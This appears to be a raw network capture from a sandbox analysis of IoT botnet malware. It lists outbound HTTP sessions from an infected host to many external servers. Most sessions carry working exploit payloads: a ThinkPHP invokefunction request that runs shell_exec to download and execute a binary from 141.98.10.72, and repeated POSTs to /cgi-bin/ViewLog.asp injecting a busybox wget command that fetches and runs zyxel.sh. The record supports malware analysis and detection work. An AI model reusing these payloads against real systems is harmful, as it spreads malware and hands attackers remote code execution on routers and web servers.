                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:32.754200935 CET492INHTTP/1.1 400 Bad Request
                                                        Server: kngx/1.10.2
                                                        Date: Wed, 14 Feb 2024 08:34:32 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 172
                                                        Connection: close
                                                        KS-Deny-Reason: client|81.181.57.74|cdnhncm412-cache02.cdnhncm412.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                        x-link-via: hncm412:80;
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        699192.168.2.1445566112.28.225.14080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:32.383281946 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        700192.168.2.144881485.122.222.508080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:32.432801008 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        701192.168.2.144160694.130.50.968080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:32.437664986 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        702192.168.2.145978288.221.70.20280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:32.443679094 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:32.644942999 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:34:32 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:32 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 36 35 61 33 33 62 38 26 23 34 36 3b 31 37 30 37 38 39 39 36 37 32 26 23 34 36 3b 32 30 63 35 36 64 32 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;b65a33b8&#46;1707899672&#46;20c56d27</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        703192.168.2.144056631.136.178.418080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:32.452892065 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:33.157490015 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:34.533369064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:37.413261890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:43.045017958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:54.052666903 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:16.067727089 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:01.121902943 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        704192.168.2.144036831.132.40.08080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:32.457603931 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:32.688285112 CET301INHTTP/1.0 302 Found
                                                        Pragma: no-cache
                                                        Location: https://192.168.0.14:4443/cgi-bin/ViewLog.asp
                                                        Content-type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 33 30 32 20 44 6f 63 75 6d 65 6e 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 31 39 32 2e 31 36 38 2e 30 2e 31 34 3a 34 34 34 33 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 3c 50 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html> <head> <title>302 Document moved</title> </head><body>This document has moved <A HREF="https://192.168.0.14:4443/cgi-bin/ViewLog.asp">here</A>.<P></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        705192.168.2.143704894.68.1.188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:32.494452953 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        706192.168.2.143893062.29.102.188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:32.500161886 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        707192.168.2.143417031.200.61.678080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:32.501604080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        708192.168.2.145856295.86.122.1688080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:32.505074978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        709192.168.2.144085295.209.145.2980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:32.507287979 CET122INHTTP/1.1 500 Server Error
                                                        Content-Length: 53
                                                        Date: Wed, 14 Feb 2024 08:34:31 GMT
                                                        Connection: keep-alive
                                                        Feb 14, 2024 09:34:32.510318995 CET65INData Raw: 45 72 72 6f 72 20 35 30 30 3a 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 43 6c 69 65 6e 74 20 73 65 6e 74 20 6d 61 6c 66 6f 72 6d 65 64 20 72 65 71 75 65 73 74
                                                        Data Ascii: Error 500: Server ErrorClient sent malformed request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        710192.168.2.144813062.148.236.1718080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:32.515976906 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        711192.168.2.1459872112.29.212.7680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:32.614334106 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:32.967438936 CET492INHTTP/1.1 400 Bad Request
                                                        Server: kngx/1.10.2
                                                        Date: Wed, 14 Feb 2024 08:34:32 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 172
                                                        Connection: close
                                                        KS-Deny-Reason: client|81.181.57.74|cdnhncm412-cache02.cdnhncm412.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                        x-link-via: hncm412:80;
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        712192.168.2.1459888112.29.212.7680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:32.736579895 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:33.090449095 CET492INHTTP/1.1 400 Bad Request
                                                        Server: kngx/1.10.2
                                                        Date: Wed, 14 Feb 2024 08:34:32 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 172
                                                        Connection: close
                                                        KS-Deny-Reason: client|81.181.57.74|cdnhncm412-cache02.cdnhncm412.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                        x-link-via: hncm412:80;
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        713192.168.2.145155488.208.7.17380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:34.322926044 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:34.527681112 CET323INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:34:34 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        714192.168.2.145859688.119.160.13480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:34.338320017 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:34.559305906 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:34:34 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        715192.168.2.144190495.86.98.1758080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:35.056763887 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
